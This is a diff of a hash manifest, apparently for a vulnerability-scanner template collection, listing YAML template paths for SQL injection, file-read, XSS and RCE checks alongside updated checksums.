-http/vulnerabilities/other/ecshop-sqli.yaml:73f5fed58843e722365a151070cf40883d9904e8 -http/vulnerabilities/other/ecsimagingpacs-rce.yaml:f164d2d090a83ab477ca92b11aa98a03186de57b -http/vulnerabilities/other/eibiz-lfi.yaml:96b942ff0274731b6424bbd1542ed0862a81a99c -http/vulnerabilities/other/elFinder-path-traversal.yaml:3f161f7a05bb4b43f8e5cf4f97a2c994cb16ee7a -http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:3ba77d5ed932c7afdd644938acb57af6296fcd06 -http/vulnerabilities/other/empirecms-xss.yaml:c98eda14b3edc7ea3d0328836b887f386463221e -http/vulnerabilities/other/ems-sqli.yaml:854eff7a218726135bd5f97558cd07ef099869af +http/vulnerabilities/other/dotnetcms-sqli.yaml:af7f4950eaac888fa6bb40dc253f6c23fdfe2f9b +http/vulnerabilities/other/dss-download-fileread.yaml:fa2a70d76e4b6a402f135a3d5ad09404bd539e3f +http/vulnerabilities/other/duomicms-sql-injection.yaml:9f839065f6dc2a1edfd4bf425dbf943f6a9ba670 +http/vulnerabilities/other/dzzoffice-xss.yaml:7925b71b798fce655b43dfb18cf75246b5629cb6 +http/vulnerabilities/other/ecshop-sqli.yaml:b4f5d54e8ada68281039d7f722e52ddf518a4c96 +http/vulnerabilities/other/ecsimagingpacs-rce.yaml:0ae513b5158c949a41510c0ba7eeb6180f0bb8ce +http/vulnerabilities/other/eibiz-lfi.yaml:47b6bb1e4f444de3eaac7dd2dccdae6cb74a5e4e +http/vulnerabilities/other/elFinder-path-traversal.yaml:ee01a1a8074bb311ebd0c184d7ce21146efe8954 +http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:cb9569c1a1dff4919b3d7a188c7bba942b75e3b9 +http/vulnerabilities/other/empirecms-xss.yaml:0970962fec73d8042af79640b70dfe51a8a6e0c5 +http/vulnerabilities/other/ems-sqli.yaml:ba6bf3f9f484fab9d8f6795f0805f8bb3508d458 http/vulnerabilities/other/epp-server-lfi.yaml:215a78ad771ccd54039602b9e26afebe163e1c58 -http/vulnerabilities/other/eris-xss.yaml:e488a4c2c5a016f0b91887491c6511d03a239e9d -http/vulnerabilities/other/etouch-v2-sqli.yaml:07d89214f2cd091a430bc30da7ca03629ef9f1ee -http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:c789621f6033b27a0334174b02bf243b28be47fc -http/vulnerabilities/other/eyelock-nano-lfd.yaml:7b2cb591ed3d7f6268340ef7f9092a5fdf5ec39b +http/vulnerabilities/other/eris-xss.yaml:11b0e99132dac6b2810cc889acfb36709dab136e +http/vulnerabilities/other/etouch-v2-sqli.yaml:d872aa61e7e37aa3248e11216072c2cb088f1ded +http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:cf0877f4b11c290ace11d751d20b64322800fa3c +http/vulnerabilities/other/eyelock-nano-lfd.yaml:21214d2cd9bfa270fa93934ee9c20e0cda6c6b84 http/vulnerabilities/other/fanruanoa2012-disclosure.yaml:473036925b09bc0d3c7018e7e1ed098b7c8bdb1d -http/vulnerabilities/other/fatpipe-auth-bypass.yaml:8efdc80334bf106fcaca4abd17838405e6ebe93b -http/vulnerabilities/other/fatpipe-backdoor.yaml:633809e2c6a4883a79a6eb71b63e572604024ff2 -http/vulnerabilities/other/feifeicms-lfr.yaml:b966cbed870baa1580c541741612df96b5d43ebf -http/vulnerabilities/other/finecms-sqli.yaml:aaf22734841ab87b4ede0fb5b4867de436fa2e2e -http/vulnerabilities/other/finereport-path-traversal.yaml:cc6fd83131af4c35c13963578f92492b99b912ce -http/vulnerabilities/other/flatpress-xss.yaml:944bef57109f6cd9d69ff3096dc728853ec336f8 -http/vulnerabilities/other/flir-path-traversal.yaml:51d9d97638396bf6cb74e4699937a76fdcb556a0 -http/vulnerabilities/other/geovision-geowebserver-lfi.yaml:fe2f02f42eb6851b3a5a647c1c3800cdb2a5aaa3 -http/vulnerabilities/other/geovision-geowebserver-xss.yaml:05e886f4b196ca4468b0c02788469b6459fe5bbf -http/vulnerabilities/other/global-domains-lfi.yaml:7879bb5ebfa5ce22ab62a03d1380ad620114d8c0 -http/vulnerabilities/other/global-domains-xss.yaml:3c06529176eb0f5472b9a44082a23fb1a2c2c073 +http/vulnerabilities/other/fatpipe-auth-bypass.yaml:fd3e6a0e4937158ca8355397a12ad2d76179ea7e +http/vulnerabilities/other/fatpipe-backdoor.yaml:b65fb4b556451bb4efcb95bb1e61b0071f298162 +http/vulnerabilities/other/feifeicms-lfr.yaml:6a2beec04e889966759a54d395995111d8e377af +http/vulnerabilities/other/finecms-sqli.yaml:c60a1b2540f3a44c3ab761b7e33220ddd04a26a1 +http/vulnerabilities/other/finereport-path-traversal.yaml:acf3ab5ed340f52d4cd05978d9a979dcbf739902 +http/vulnerabilities/other/flatpress-xss.yaml:169ea8197e997c60eda30ba7f5fc7452bf41ad7f +http/vulnerabilities/other/flir-path-traversal.yaml:9529250068d4cc6176f4f21709ffc6cee43699b6 +http/vulnerabilities/other/geovision-geowebserver-lfi.yaml:2967ba86ac9ef6ee7c280dfec45d6c4efca20bc2 +http/vulnerabilities/other/geovision-geowebserver-xss.yaml:c3ba58397f720491d399aa4d6a01681f3965ee25 +http/vulnerabilities/other/global-domains-lfi.yaml:b64483ed0e20fabc4a4ed0c2104c668aa480ce11 +http/vulnerabilities/other/global-domains-xss.yaml:a4fbd3f667dc3b73b1cdb1649370c56457dd9f40 http/vulnerabilities/other/gloo-unauth.yaml:534b7e115718699591a88e421a722de3f3716ed9 -http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml:77c38e3bef3d5f8c614e32c2855398159a1f2527 -http/vulnerabilities/other/goip-1-lfi.yaml:cb16aea4f9c1d9206e40e479af77e8586e75768a -http/vulnerabilities/other/graylog-log4j.yaml:6ce9efbb3992bd2c2e26f20565582903b2cb4797 -http/vulnerabilities/other/groupoffice-lfi.yaml:429f0043fc8e7a43da6a593d8bff65e2acce13f0 -http/vulnerabilities/other/gsoap-lfi.yaml:2cbdb97ef86a492e16f533496f7a75b3a2fe0396 -http/vulnerabilities/other/h3c-imc-rce.yaml:0319ffebff503659176733403bc375d5a8c04046 -http/vulnerabilities/other/hanming-lfr.yaml:4a2bb210b1ffe656f65fb2276245706e7e79ad3c -http/vulnerabilities/other/hashicorp-consul-rce.yaml:ca9d5d83c75b9c7fc700c18a19799eb0ac61d2d7 -http/vulnerabilities/other/hasura-graphql-psql-exec.yaml:3558176bafe1c16bdb31850ac59d342bb5537b56 +http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml:ac2cdb2ef24f9e6d956557846a4cbc59ba17c8b4 +http/vulnerabilities/other/goip-1-lfi.yaml:28bd276bfce700aa2ef830cad5ffb019362bdadb +http/vulnerabilities/other/graylog-log4j.yaml:885f20903cc5ff135d7cc24a4eba8cc1c5dfbea9 +http/vulnerabilities/other/groupoffice-lfi.yaml:b5ffc529ae65209dc1f7c76a4bee9407cc933713 +http/vulnerabilities/other/gsoap-lfi.yaml:d8e32a1aa49c625b9abe89c2f50766a1f5b19281 +http/vulnerabilities/other/h3c-imc-rce.yaml:d829aafafb8ce340df6d8fe0504510299452aa5a +http/vulnerabilities/other/hanming-lfr.yaml:ce4a799b94d279989b1146225441fdb890a49761 +http/vulnerabilities/other/hashicorp-consul-rce.yaml:ae9fb00d41b4995204df6a93a764402e905ed1cc +http/vulnerabilities/other/hasura-graphql-psql-exec.yaml:74a33000ab592e3f9bcdaa5cf8d31131fd7bcc18 http/vulnerabilities/other/hasura-graphql-ssrf.yaml:c3cb2e74fac9f20285f72ac1e2ea2fd7b051fc72 -http/vulnerabilities/other/hiboss-rce.yaml:ea2c6f85a500c622ed4d93be09682d8ddcdce732 -http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml:5823c06ba11f9da039b7cb6dfa99dd9d73d5e0c2 -http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml:539343d19c945203ad6c61e1536e11630fbfe96c -http/vulnerabilities/other/homeautomation-v3-openredirect.yaml:a88a43a16acd3c9110479a62ed27f51becf6332c -http/vulnerabilities/other/hospital-management-xss.yaml:4452a9eb0e1c8d910c14c71165a0d6728438312e -http/vulnerabilities/other/hospital-management-xss2.yaml:ff5b376a8b77a31ae3d9687b70085a865ac8e364 -http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml:f5db66489aa5d252a6adec1de800f62f830d0899 -http/vulnerabilities/other/huawei-hg659-lfi.yaml:3557fafe359719037a9c4536fb30f2e76400d621 -http/vulnerabilities/other/huawei-router-auth-bypass.yaml:ae7a38304de60767c3ea744cbb6d7f7853852a80 -http/vulnerabilities/other/huijietong-cloud-fileread.yaml:bf71524e1ccb9298a70182eb50fa987d7cbcdb76 -http/vulnerabilities/other/icewarp-open-redirect.yaml:89a77881f8e3cc9a83c39b45e5dd8690b933644a -http/vulnerabilities/other/icewarp-webclient-rce.yaml:0090098d3f555d2b0ce2a91d2f0a90fcbb3cf4ba -http/vulnerabilities/other/inspur-clusterengine-rce.yaml:a719343aaf8b5516f52bee07ae1978af25014167 -http/vulnerabilities/other/interlib-fileread.yaml:3ad4117416b66061dc988e6383c24a7cc6637384 -http/vulnerabilities/other/java-melody-xss.yaml:45cc813c3fc0a50092791f6f1a886422ca92f982 -http/vulnerabilities/other/jeewms-lfi.yaml:555f43f98c09f29bbd70436cb7f4a8854d8833b3 +http/vulnerabilities/other/hiboss-rce.yaml:44f05e1531e73c1d4ed36dd40b0fbe7de14ad174 +http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml:b9097a1747209f2c9a7b151512d8420052e4d445 +http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml:c14487d5e183cf5ffdacc95f6b705fd10af96b55 +http/vulnerabilities/other/homeautomation-v3-openredirect.yaml:dc813876213b8b93632e69639197768f999d1888 +http/vulnerabilities/other/hospital-management-xss.yaml:8db6e709c266709a159ce1914d761ac3a3894e29 +http/vulnerabilities/other/hospital-management-xss2.yaml:c0ed62c74dfa3095138786737f38c16ac6a8ca50 +http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml:47d6df9ee15889ee4ac9520afc70572c20b35e5b +http/vulnerabilities/other/huawei-hg659-lfi.yaml:153ac378223f36a765f5c11859f9686588ef96cd +http/vulnerabilities/other/huawei-router-auth-bypass.yaml:02e9cdbfe7a617cc9bd386b768c9cb87cb307828 +http/vulnerabilities/other/huijietong-cloud-fileread.yaml:8837f0510adff944c21b7a8bd834d8fb26b324d9 +http/vulnerabilities/other/icewarp-open-redirect.yaml:3c0950d121344dce646aa7c44e5cf26797cf57d1 +http/vulnerabilities/other/icewarp-webclient-rce.yaml:a6173da20141f99f9999e920929bb6427b3f710d +http/vulnerabilities/other/inspur-clusterengine-rce.yaml:6a41c5362bd90bcc2c274d23d09b830b4fea7ff8 +http/vulnerabilities/other/interlib-fileread.yaml:9317c432701aa30efec7a236b30f62d321fda237 +http/vulnerabilities/other/java-melody-xss.yaml:eb696c05015b61a6afa372af35915e23eaaf1807 +http/vulnerabilities/other/jeewms-lfi.yaml:befa6ebb2eb212d64d62d6748b508d3a2e553cc7 http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml:de3b5d22504bee5bbf09b6ba157ff54f706986fe -http/vulnerabilities/other/jinfornet-jreport-lfi.yaml:92b45a8d8b9f714a7342a986de7072fe296b3bca -http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml:efcc0a98179e422448d796481142552ca3951db5 -http/vulnerabilities/other/kafdrop-xss.yaml:c5fecabce719ccd8b9a5cc15ccb520277b367be4 -http/vulnerabilities/other/karel-ip-phone-lfi.yaml:82bdeed1435c3ec293760419f38fa8bd6d4cea55 -http/vulnerabilities/other/kavita-lfi.yaml:126eb256fb4932d8e26b8abd1335d7e6b983d34a -http/vulnerabilities/other/kevinlab-bems-backdoor.yaml:b4e24a11b939d6c2ef3ebd136e5c1fb785f1b7bf -http/vulnerabilities/other/kevinlab-bems-sqli.yaml:39c549fa8a59a1a215a1bab2804dcfc8b6d7a8e7 -http/vulnerabilities/other/kevinlab-hems-backdoor.yaml:70201943ffc6f41ef885442ef10b52f7d5797f86 -http/vulnerabilities/other/keycloak-xss.yaml:c80b74c62a6b50985d0bad53eff7214d98fc559b -http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:3e1147a581da118418622f538b8caa7d796b3ec9 -http/vulnerabilities/other/kingsoft-v8-file-read.yaml:2a0a85fa141ecc57a20971c096ab4f9ed4e5b5fe +http/vulnerabilities/other/jinfornet-jreport-lfi.yaml:b13da408a16528d8e74cb2a0f89ae360767e4cc7 +http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml:5b537a37ac59f2a7fe35426cadcfc5e14f8e670e +http/vulnerabilities/other/kafdrop-xss.yaml:f52a5f2eeb35e7301b6c77c414eed0eddb2e6e26 +http/vulnerabilities/other/karel-ip-phone-lfi.yaml:c8d71d10850c1117036b87f8bd0c367835839b8c +http/vulnerabilities/other/kavita-lfi.yaml:4520e4101caef5897a8fed0ef071037066c6782d +http/vulnerabilities/other/kevinlab-bems-backdoor.yaml:ec5c267de0d45a0b865eb83648860657eeb0372f +http/vulnerabilities/other/kevinlab-bems-sqli.yaml:1d477f20f22dc2fad514eb4c7f89fbf88bb84c7b +http/vulnerabilities/other/kevinlab-hems-backdoor.yaml:432e3630adcb995dfd17133b380f417c36dde2d0 +http/vulnerabilities/other/keycloak-xss.yaml:d20e3322f3430593356ac31c1ba2b9a0d6389d40 +http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:4a0dda044e05cda0742d803bc497b69fa89a5f0c +http/vulnerabilities/other/kingsoft-v8-file-read.yaml:aa0e37be669e21c2f3a608952a0bd1c94394632f http/vulnerabilities/other/kiwitcms-json-rpc.yaml:04ed57277189ff7f95571626e9980dd6b1cfadae -http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:62edeee85be7544edd93f1b79567ed513a6d75fe -http/vulnerabilities/other/laravel-filemanager-lfi.yaml:490acfef21f7ddf17bf0aba030cf888a5c68ef0c -http/vulnerabilities/other/loancms-sqli.yaml:704eaad9603a8edfa6324cc79c5d4609d3c5fd2a -http/vulnerabilities/other/lotuscms-rce.yaml:32739b1a64a7e8f09d4c05fb0a72fd7001493aa7 -http/vulnerabilities/other/lucee-xss.yaml:11e97d901d3a49887ae7fa8a3647e0c0661d76c1 +http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:d4cac1b72d69f601bdf6537be92a9304732eb322 +http/vulnerabilities/other/laravel-filemanager-lfi.yaml:93c7a647675b6871fdd205791ba02386f3ffa2bb +http/vulnerabilities/other/loancms-sqli.yaml:1af77042e6574ada335fb0835cebf8757ee84547 +http/vulnerabilities/other/lotuscms-rce.yaml:09c9c68abd73286b22dd00324f27559de8fee07e +http/vulnerabilities/other/lucee-xss.yaml:074e52889f7925ac10f2f77c289f9fc2e6fb9635 http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml:f846c1237f6ac8eae7a5e5f8416e4ce0cf8a15e8 -http/vulnerabilities/other/maccmsv10-backdoor.yaml:8666388f39e954c3f5ab1f387ed6acd71751e0ae -http/vulnerabilities/other/magicflow-lfi.yaml:21f220a7d9bb933281ef8d7fbc28f806c655dc43 -http/vulnerabilities/other/mcafee-epo-rce.yaml:3f5974691e6637668f348445056149a20dbe958e +http/vulnerabilities/other/maccmsv10-backdoor.yaml:385b1ce64583b7578a018dbe115a9a195dab9395 +http/vulnerabilities/other/magicflow-lfi.yaml:28652b99f9ce5a03ae81c913b09db374e741c593 +http/vulnerabilities/other/mcafee-epo-rce.yaml:f8af51f69e8785a359f393c1f6d614b10a8ebd53 http/vulnerabilities/other/metabase-log4j.yaml:854f802d58d9c239ea3b71af07438766918bdffa -http/vulnerabilities/other/metinfo-lfi.yaml:d3da71e8a50f94d9d44b4fd617274608c8c28d87 +http/vulnerabilities/other/metinfo-lfi.yaml:8382d8659cc82d8ccce6b971a73f0864cf69d1a8 http/vulnerabilities/other/microstrategy-ssrf.yaml:e9020764a1afd972a044db4b9d3665d20c823e0d -http/vulnerabilities/other/microweber-xss.yaml:60a4b475a6aecfc93c59eec122b247d7f312c868 -http/vulnerabilities/other/mida-eframework-xss.yaml:36d55dea284bdf98addcbf9b146e5da208fca0fb -http/vulnerabilities/other/minimouse-lfi.yaml:6def0b489e63a90f79bb0417f9b157cf019322ad -http/vulnerabilities/other/mirai-unknown-rce.yaml:eada1ea3612b77943ba9209d4f28e52698788f07 -http/vulnerabilities/other/mpsec-lfi.yaml:0fc7792633be9be652ad9e8b9df35c3ec9abfa53 -http/vulnerabilities/other/myucms-lfr.yaml:a6cca068a7c92e1a958ae0db756acf243a026020 -http/vulnerabilities/other/natshell-path-traversal.yaml:778f83520bfb3767deacb832b4716e404b376d31 -http/vulnerabilities/other/natshell-rce.yaml:dd11a27b9ba607db2210a0937d9f26c0e96971cf -http/vulnerabilities/other/netgear-router-auth-bypass.yaml:b40efc0a023c0997cd16c2c10cae7f628110a4fa -http/vulnerabilities/other/netgear-router-exposure.yaml:45123aee494e2fc7c18a61c67599a24301c840d8 -http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml:0c335194e4fd5766c9295730261915a6b5df4e4d -http/vulnerabilities/other/netis-info-leak.yaml:922db7f16bcb3378f12ad9f91998a27881d23f97 -http/vulnerabilities/other/nextjs-redirect.yaml:c94c5f07bba5c3e06efb3ffb681bc3b3d3c00052 -http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml:e989084149ff35f7e1bbd021aecbcda5f905e078 -http/vulnerabilities/other/nginx-module-vts-xss.yaml:db697a6a36d4fe132560673035dc9f0f24507099 -http/vulnerabilities/other/ns-asg-file-read.yaml:1d8bed09fcb1e93720bb6ad594e08e81515bb9fe -http/vulnerabilities/other/nuuo-file-inclusion.yaml:c68b1306bacb0d63d63f59ace0ec0d18102b7343 -http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml:68c1406d935480ef8b340bac94fa8c7fd5898ca4 -http/vulnerabilities/other/odoo-cms-redirect.yaml:c7e97fd0ba88ac6835a7815ed88c8f97744ad001 -http/vulnerabilities/other/oliver-library-lfi.yaml:a379f4962cedc3b129fe052164523395aa6422aa -http/vulnerabilities/other/onlinefarm-management-xss.yaml:f90876ef02585030834ba700c7b688161a0a5588 -http/vulnerabilities/other/opencti-lfi.yaml:3740c6c5e159e587e2ed902dc9a11fbb3e756c7d -http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:c07d5d532ac995fab7534a9a9e18d79e3a575f8d -http/vulnerabilities/other/opensis-lfi.yaml:5af89e7e23bf6bee117d03426b61c1865321caaa -http/vulnerabilities/other/opensns-rce.yaml:ef410f4fe95a1c95d8bd5cbfb158326ab12e81c9 +http/vulnerabilities/other/microweber-xss.yaml:e25f974d5759c9504844f7116acf16ec4ef3eec6 +http/vulnerabilities/other/mida-eframework-xss.yaml:eb1ba4eb5bf6fbf2dca2849668d4bd9b580203c2 +http/vulnerabilities/other/minimouse-lfi.yaml:aed6949e17e4cea8abed8b8e4dbd4bf2c9ceea25 +http/vulnerabilities/other/mirai-unknown-rce.yaml:eef14e1632384adca2bff6732c21a8ae3107cf9e +http/vulnerabilities/other/mpsec-lfi.yaml:f76df9ef25ccc3962733e8e97c4087d2e5867a48 +http/vulnerabilities/other/myucms-lfr.yaml:850b7ff8c5f60d08a2a00036d6ec3190150478bc +http/vulnerabilities/other/natshell-path-traversal.yaml:3a0fd00e217045b921571b068f2532a1f37b3093 +http/vulnerabilities/other/natshell-rce.yaml:8650a3c67a2f1d009b24cd3e632024940a632d26 +http/vulnerabilities/other/netgear-router-auth-bypass.yaml:d275c509384ad46edecc2b0668c24c559fab1339 +http/vulnerabilities/other/netgear-router-exposure.yaml:ab4e4ceb41598caf28fe16f42ee1c7837e2ab4ec +http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml:2bb3a7708d1864e922646ccc4cd6dbfdf4cd7532 +http/vulnerabilities/other/netis-info-leak.yaml:0f1557fa5b3a6b1b594b812723d450e515204075 +http/vulnerabilities/other/nextjs-redirect.yaml:a5883f360de46fd3d4549d6493be9e548a2984f7 +http/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml:e4c8f558d4500e313485dabe45d9685828cf17cd +http/vulnerabilities/other/nginx-module-vts-xss.yaml:ffbe215e919662e23793d225047978be4279b241 +http/vulnerabilities/other/ns-asg-file-read.yaml:52a34ab9846d7e5d0bcce8fd5b4e2eed22cf9be7 +http/vulnerabilities/other/nuuo-file-inclusion.yaml:16ffa5f8ddd285dae99e382f90c98b8695ae7c1e +http/vulnerabilities/other/nuuo-nvrmini2-rce.yaml:06cab88a1b2dde5c9724699dc32b3635d66d3a06 +http/vulnerabilities/other/odoo-cms-redirect.yaml:daec788bf2c7adfd1fcfbc1d7a2c833c38d2f356 +http/vulnerabilities/other/oliver-library-lfi.yaml:23411514905aaea843d599eb53907571ede17a13 +http/vulnerabilities/other/onlinefarm-management-xss.yaml:0192f757e2dcbb972af67af4f20fbced2d2ff244 +http/vulnerabilities/other/opencti-lfi.yaml:601791a3b2ddc841c2bb03a60e2334f577bd4842 +http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:ef092f29fccd311586476648381751a5ba98e9ff +http/vulnerabilities/other/opensis-lfi.yaml:c2720ff64477300039304f1774dc049cfa39f101 +http/vulnerabilities/other/opensns-rce.yaml:57c0e78f799c20e5762dc3cf31a543a32a45087c http/vulnerabilities/other/openvpn-hhi.yaml:63694e03bf5975ac1611ce628a23bb0ac0ca14d1 -http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:0c1016897891fc920ea89ce8846bae280d798bc4 -http/vulnerabilities/other/oracle-fatwire-lfi.yaml:5651a63e47b2301c943dc3404f042431be0736aa -http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml:4dc436644e3c70a6c6b16966a0e5f9a93be93992 -http/vulnerabilities/other/otobo-open-redirect.yaml:5bb178a7aecc47610b2f0d0529f8ab5ea6cbc697 -http/vulnerabilities/other/pacsone-server-lfi.yaml:4fffd0f3788f454a0f39de514f107918a4d0607c -http/vulnerabilities/other/parallels-hsphere-xss.yaml:1930aaeca897919981209b7df8069f9cf49b189d -http/vulnerabilities/other/parentlink-xss.yaml:41f2ce321f301c8bad9358891019047bd70b274a -http/vulnerabilities/other/pbootcms-database-file-download.yaml:e18d3059a6ccc2450a91eff41dde4a14e2879a94 -http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml:bb406ec1a939aabf8033834890b6f0f7e7a85afb -http/vulnerabilities/other/php-timeclock-xss.yaml:565249e4651034508ed4bf487520376d596d4d98 -http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml:8eff0c396b5a3c6f1533969620005b383c902946 -http/vulnerabilities/other/phpok-sqli.yaml:25fd423b41523b96a4b5ea3be350089d6ca4b0ed -http/vulnerabilities/other/phpwiki-lfi.yaml:c137452c056269f817fca08f156353b489a0d30a -http/vulnerabilities/other/pmb-directory-traversal.yaml:1808a7ac8c06ad56e37537b36769bcf6543b5b5b -http/vulnerabilities/other/pmb-local-file-disclosure.yaml:865bc664c200972a95beb04bf661c645bb511d43 +http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:50837167bc6a1563474999913da3b792450485ec +http/vulnerabilities/other/oracle-fatwire-lfi.yaml:ffc9d5cd66710b9af2027167b1c54077bf5ca8f1 +http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml:8331adfa215ce3f6a2804201096cd94b49f8368d +http/vulnerabilities/other/otobo-open-redirect.yaml:6800c37bfe184213f617147c3243991389af7c24 +http/vulnerabilities/other/pacsone-server-lfi.yaml:9c70ee50de9026994445bcb5038ebdfece5c5c5b +http/vulnerabilities/other/parallels-hsphere-xss.yaml:0a88f433a35d1f845e4523d8b461f775011d8a67 +http/vulnerabilities/other/parentlink-xss.yaml:f884a6331388c04b226414210f8a3e66c5ad7af8 +http/vulnerabilities/other/pbootcms-database-file-download.yaml:d1d7fe09c6186319a5d8e87a867b7286a27b5da2 +http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml:87da5310b3a936c88a2fb5013ce783c728627f8b +http/vulnerabilities/other/php-timeclock-xss.yaml:4eb8391a98dd8b8c3c01c205d9de0a42606badac +http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml:2aa0c44d951a0588404b2bf85a44a459a9a84b2b +http/vulnerabilities/other/phpok-sqli.yaml:fcc618cbd03b381f0380eb7f73c738a4fb55d1be +http/vulnerabilities/other/phpwiki-lfi.yaml:88f9fe0e453c6d93bd9226d0d8ae866d36c93148 +http/vulnerabilities/other/pmb-directory-traversal.yaml:fdbe099c6bad045dbfa40e0cdc871e63721c08bb +http/vulnerabilities/other/pmb-local-file-disclosure.yaml:c4b94a769d46f1b648d0de3e2c72f9212139f38e http/vulnerabilities/other/pmb-xss.yaml:6ad3af68f0c6f81917d0140803326b5c1152eb54 -http/vulnerabilities/other/pollbot-redirect.yaml:ccd015b5f5e58068672e379e307b4ea62c96b6b9 -http/vulnerabilities/other/powercreator-cms-rce.yaml:e28aac40e0c60c9bf34c39978cc8ecb19d9ee004 -http/vulnerabilities/other/processmaker-lfi.yaml:c09e4ec476dfe04fc84d01cca111da5348345eb9 +http/vulnerabilities/other/pollbot-redirect.yaml:135ca5cbfb68134eab8411bffc81e5d0a278ea15 +http/vulnerabilities/other/powercreator-cms-rce.yaml:71144a76d3d61ef6c2a64174a665a9d113bdd354 +http/vulnerabilities/other/processmaker-lfi.yaml:22a765d7706428093970493d2d7b93f6250a8642 http/vulnerabilities/other/pyspider-unauthorized-access.yaml:e9168ed991552569e38fabd2d9dba367d43613d9 -http/vulnerabilities/other/qcubed-xss.yaml:711e8252f71b9afd3749b6575944f77dc10572ad -http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:ad30ea9071ea6e09c7bbac70cb36ef0fd934f447 -http/vulnerabilities/other/qihang-media-disclosure.yaml:ab14343e4e010fa9f699506547598d1c2dd44c3c -http/vulnerabilities/other/qihang-media-lfi.yaml:4d4c697b58eb3b4f63c4102b9530246cd03f0d3c +http/vulnerabilities/other/qcubed-xss.yaml:2f6b5a8c12b011aca94b06d5fb262cb01cd3cc31 +http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:67fee524bbba4c2067239330d62b625c67dcf114 +http/vulnerabilities/other/qihang-media-disclosure.yaml:dad6da0182625d9a95acdfec0df21b049c4daa8d +http/vulnerabilities/other/qihang-media-lfi.yaml:3b581630106e3bd04f75366c9076ee8f1b8e8832 http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:2382325fe062c56d0e35cc5384647750325f58dd -http/vulnerabilities/other/rconfig-file-upload.yaml:731b42edd98d04ad5bf4242f2e32aee47da89b79 -http/vulnerabilities/other/reddittop-rss-xss.yaml:eed061c428b9b7479e4d9db8af59e8f3ce3f0ad6 +http/vulnerabilities/other/rconfig-file-upload.yaml:bb0dc040e78ff6d9e6208aae64bf290ece7641a4 +http/vulnerabilities/other/reddittop-rss-xss.yaml:03df8cb7029692c3157660f0aca9c22ee86884a8 http/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4d3d645b58f506e86281f8dd0b487c34b6f6bbb5 http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67f01721d137ddbd9d5 http/vulnerabilities/other/resin-viewfile-lfr.yaml:7de92f9c19448bcd34a9989dd162fa46334dd6e7 -http/vulnerabilities/other/rockmongo-xss.yaml:51325e6c9dfc00e9b915e6727ceb60f05bc8aca0 +http/vulnerabilities/other/rockmongo-xss.yaml:758b23dabf3dfe4171b30ae387f273b25dba466c http/vulnerabilities/other/rundeck-log4j.yaml:8ed0f5fd8cb88601cf94af5d570ecc4afd035fab -http/vulnerabilities/other/sap-redirect.yaml:f92c53daa0009a91f8e56e0dc686bb762214bd2c -http/vulnerabilities/other/sar2html-rce.yaml:c4b28eba7b955b47c1fc9557bd5c7f6b7bddfc19 +http/vulnerabilities/other/sap-redirect.yaml:47a5370349446eee54ad22c333d902cd82c73e30 +http/vulnerabilities/other/sar2html-rce.yaml:f1760b0bcbdfd892a53c31fadee6d698b6503c0f http/vulnerabilities/other/seacms-rce.yaml:eaa2ae8e9b835a93b7a091a91f083e519ed4603c -http/vulnerabilities/other/seacms-sqli.yaml:baac0c8d0185502c18a2b6eb5b1bf82e54f079d1 -http/vulnerabilities/other/seowon-router-rce.yaml:a5d00a58474349d3a5f62898b60540a23c50aa9f +http/vulnerabilities/other/seacms-sqli.yaml:052b91b996a94cf994e484e2f7fc89dad65c3f89 +http/vulnerabilities/other/seowon-router-rce.yaml:87ffab8cf0b6a16ff367c867ff85393e465e6529 http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:bcda3ec85d9430d886543afd053c6df1e8266d87 -http/vulnerabilities/other/sick-beard-xss.yaml:8b21d313bb67654f84283e831e366216070d05f4 -http/vulnerabilities/other/siteminder-dom-xss.yaml:3e0fc47af7bcf6ee45a7931857d0ad479ec908ca -http/vulnerabilities/other/sl-studio-lfi.yaml:160d0326c30a4148bd2e955eb489a54b3a5d57c2 +http/vulnerabilities/other/sick-beard-xss.yaml:2914e2859e9e5285409ab4357819862f0f0e6668 +http/vulnerabilities/other/siteminder-dom-xss.yaml:4ff5aff6fd516099bddce89f88f8cf5fdc07125d +http/vulnerabilities/other/sl-studio-lfi.yaml:2c169f4eb245ceb6085091203c8bc20846a70b5c http/vulnerabilities/other/slims-xss.yaml:7e6bd25a7ce06bb760799dbdd6c50ffc76b32815 -http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml:34bf57203c81c12e208ff2498d6a3209a7202ec5 